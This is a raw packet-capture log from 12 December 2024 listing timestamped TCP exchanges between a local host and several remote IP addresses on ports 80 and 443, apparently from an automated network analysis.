                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.893172979 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.893224001 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.894141912 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.894188881 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.894311905 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.894352913 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.895230055 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.895283937 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.895483971 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.895531893 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.896325111 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.896436930 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.896488905 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.897403002 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.897500038 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.897550106 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.898376942 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.898433924 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.898643970 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.898708105 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.899499893 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.899558067 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.899895906 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.899941921 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.900515079 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.900566101 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.900643110 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.900690079 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.901583910 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.901623964 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.901663065 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.901700020 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.902631998 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.902677059 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.902726889 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.902764082 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.903784037 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.903897047 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.903945923 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.904972076 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.905015945 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.905056000 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.905090094 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.905911922 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.905951977 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.905997992 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.906038046 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.906873941 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.906922102 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.906932116 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.906956911 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.907955885 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.908050060 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.908113956 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.908946037 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.908991098 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.909017086 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.909094095 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.910063028 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.910110950 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.910154104 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.910196066 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.911134958 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.911201954 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.911251068 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.911289930 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.912199020 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.912305117 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.912352085 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.913274050 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.913314104 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.913361073 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.913399935 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.914325953 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.914448023 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.914493084 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.915393114 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.915441990 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.915472031 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.915518045 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.916619062 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.916654110 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.916728973 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.916728973 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.917503119 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.917588949 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.917637110 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.918610096 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.918658972 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.918688059 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.919581890 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.919729948 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.919785023 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.919847012 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.919892073 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.920706987 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.920753956 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.920779943 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.920824051 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.921766996 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.921812057 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.921865940 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.921907902 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.922800064 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.922879934 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.922923088 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.922960997 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.923942089 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.927561045 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.059767008 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.059871912 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.059925079 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.060240030 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.060292959 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.060364008 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.060424089 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.061393023 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.061438084 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.061542034 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.061587095 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.062367916 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.062412977 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.062501907 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.062546015 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.063420057 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.063469887 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.063530922 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.064528942 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.064579010 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.064603090 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.064646959 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.065592051 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.065639973 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.065704107 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.065747023 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.066632032 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.066684961 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.066740036 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.066781998 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.067708015 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.067845106 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.067890882 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.068768024 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.068814993 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.068845034 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.068886995 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.069936991 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.069983006 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.069999933 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.070041895 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.070861101 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.070904970 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.070934057 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.070974112 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.071916103 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.072011948 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.072072983 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.073110104 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.073153973 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.073288918 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.073332071 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.074047089 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.074090958 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.074157000 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.074199915 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.075098991 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.075154066 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.075190067 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.075234890 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.076209068 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.076297998 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.076359034 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.077234983 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.077280998 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.077359915 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.077403069 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.078398943 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.078444958 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.078519106 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.078561068 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.079394102 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.079500914 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.079551935 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.080413103 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.080460072 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.080657005 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.080701113 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.081532001 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.081588030 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.081676960 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.081717014 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.082617998 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.082664013 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.082784891 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.082828999 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.083630085 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.083683968 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.083734035 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.084645987 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.084711075 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.084744930 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.084789038 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.085731983 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.085782051 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.085844040 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.085891008 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.086806059 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.086858034 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.086922884 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.086968899 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.087821007 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.087882996 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.330770969 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.330790043 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.331785917 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.331904888 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.333883047 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.375359058 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.876992941 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.877072096 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.881278992 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.881289959 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.881580114 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.881632090 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.882045031 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:19.923331022 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.070830107 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.070970058 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.070986986 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.071046114 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.071190119 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.071234941 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.071335077 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.075341940 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.075419903 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.075536966 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.075886011 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:20.075916052 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.338228941 CET4986880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.338628054 CET4988480192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.458343983 CET8049884185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.458416939 CET8049868185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.458419085 CET4988480192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.458489895 CET4986880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.459445953 CET4988480192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.579195976 CET8049884185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.769948006 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.770128012 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.927500010 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.927514076 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.927845001 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.927896023 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.975285053 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.015332937 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.094912052 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.094948053 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.095055103 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.107211113 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.107227087 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.811506987 CET8049884185.215.113.43192.168.2.10
